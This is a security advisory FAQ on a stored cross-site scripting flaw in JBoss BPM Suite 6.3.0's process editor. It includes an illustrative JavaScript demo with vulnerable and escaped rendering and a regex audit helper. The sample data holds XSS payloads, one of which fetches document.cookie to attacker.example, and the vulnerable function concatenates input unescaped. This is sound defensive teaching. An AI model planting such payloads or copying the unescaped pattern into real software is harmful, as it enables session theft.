REDHAT-BUG-1358523: XSS
JBoss BPM Suite 6.3.0 is vulnerable to a stored cross-site scripting (XSS) flaw in the business process editor. A remote, authenticated attacker who holds the privilege to create business processes can embed script in a process definition; the stored content is not properly sanitized before it is rendered to other users, including administrators, in whose browsers the script then executes.
Frequently Asked Questions
What is the severity of REDHAT-BUG-1358523?
The severity of REDHAT-BUG-1358523 is classified as medium: successful exploitation gives stored XSS against any user who views the process, including administrators, but it requires an authenticated account that already holds the privilege to create business processes.
Who is affected by the vulnerability REDHAT-BUG-1358523?
Deployments of JBoss BPM Suite 6.3.0 are affected. The attack is mounted by an authenticated user with permission to create business processes; the victims are any users, including administrators, who later open the stored process in the editor.
How do I fix REDHAT-BUG-1358523?
To fix REDHAT-BUG-1358523, upgrade JBoss BPM Suite to a release that Red Hat lists as addressing this bug. Until the upgrade is applied, limit the privilege to create business processes to trusted users, since that privilege is the precondition for planting the payload, and review existing process definitions for injected markup.
What type of attack does REDHAT-BUG-1358523 enable?
REDHAT-BUG-1358523 enables a stored cross-site scripting (XSS) attack.
What can attackers do with the vulnerability REDHAT-BUG-1358523?
Attackers exploiting REDHAT-BUG-1358523 can store malicious scripts within business processes; the scripts execute in the browser of every user who views those processes, including administrators, with that user's session.
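The pattern described in the advisory, as an added example that is not JBoss BPM Suite code: stored process metadata concatenated straight into markup (vulnerable) beside the same view with context-appropriate HTML encoding (hardened), plus a small audit helper of the kind a responder would run over already-stored definitions. The process records, field names (`name`, `documentation`) and the attacker payloads are constructed for illustration and do not reproduce the product's data model.

```javascript
// Added example (not JBoss BPM Suite code): stored XSS in a process-listing
// view, the vulnerable rendering beside the hardened one, plus an audit
// helper that flags stored process definitions carrying script-like content.
// All data and field names below are constructed for illustration.

// Process metadata as stored by a user who is allowed to create business
// processes (constructed sample; the second record is attacker-authored).
const storedProcesses = [
  { id: "order.Approval", name: "Order approval", documentation: "Routes orders over 10k." },
  {
    id: "hr.Onboarding",
    name: 'Onboarding<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
    documentation: 'x" onmouseover="alert(document.domain)',
  },
];

// Vulnerable: stored fields are interpolated straight into markup, so whatever
// the process author typed is parsed as HTML when another user (or an admin)
// opens the view. One payload lands in text context, the other breaks out of
// a quoted attribute.
function renderProcessVulnerable(p) {
  return `<div class="process" title="${p.documentation}">` +
         `<h2>${p.name}</h2></div>`;
}

// Hardened: encode for the HTML context the value lands in. Escaping these
// five characters is sufficient for text content and for attribute values
// that are always wrapped in double quotes, as they are below.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderProcessSafe(p) {
  return `<div class="process" title="${escapeHtml(p.documentation)}">` +
         `<h2>${escapeHtml(p.name)}</h2></div>`;
}

// Audit helper for responders: shortlist already-stored definitions whose
// free-text fields contain tags, event handlers or javascript: URLs.
// Heuristic regexes, not an HTML parser; hits need manual review.
const SUSPICIOUS = [
  /<\s*script/i,
  /<\s*\/?\s*(iframe|img|svg|object|embed)/i,
  /\bon[a-z]+\s*=/i,
  /javascript\s*:/i,
];

function findSuspiciousProcesses(processes) {
  return processes
    .filter((p) => ["name", "documentation"]
      .some((field) => SUSPICIOUS.some((re) => re.test(p[field] ?? ""))))
    .map((p) => p.id);
}

// Demonstration when run directly with Node: node stored_xss_example.js
if (typeof require !== "undefined" && require.main === module) {
  for (const p of storedProcesses) {
    console.log("vulnerable:", renderProcessVulnerable(p));
    console.log("hardened:  ", renderProcessSafe(p));
  }
  console.log("flagged for review:", findSuspiciousProcesses(storedProcesses));
}
```

Running it shows the vulnerable view emitting a live `<script>` element and an `onmouseover` handler from the attacker's record, while the hardened view renders the same strings as inert text (`&lt;script&gt;`, `&quot;`). Output encoding at the rendering layer is the fix; the audit helper only narrows down which stored processes to inspect while a patched release is rolled out.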